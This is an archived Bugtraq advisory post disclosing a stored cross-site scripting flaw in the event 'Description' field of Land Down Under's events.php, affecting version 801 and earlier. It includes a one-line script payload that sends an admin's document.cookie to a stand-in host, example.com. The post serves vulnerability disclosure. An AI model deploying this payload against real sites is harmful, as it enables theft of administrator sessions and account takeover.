Bugtraq mailing list archives
Land Down Under 'events.php' Cross Site Scripting Vulnerability
From: conor.e.buckley () gmail com
Date: 5 Sep 2005 20:11:45 -0000
In Land Down Under (LDU http://www.neocrome.net/), the target script "events.php?m=add" is vulnerable to XSS. When submitting an event, the "Description" field is vulnerable to HTML injection. Any user logged in can submit an event but an admin must approve of the event before being publicly viewed. Using javascript, an admin's cookie can be stolen. Exploit: Description: <script>document.location="http://example.com/script?cookie="+escape(document.cookie)</script> LDU 801 and earlier are vulnerable. -------------------------------- conor.e.buckley () gmail com http://quixote.at.preempted.net
Current thread:
- Land Down Under 'events.php' Cross Site Scripting Vulnerability conor . e . buckley (Sep 06)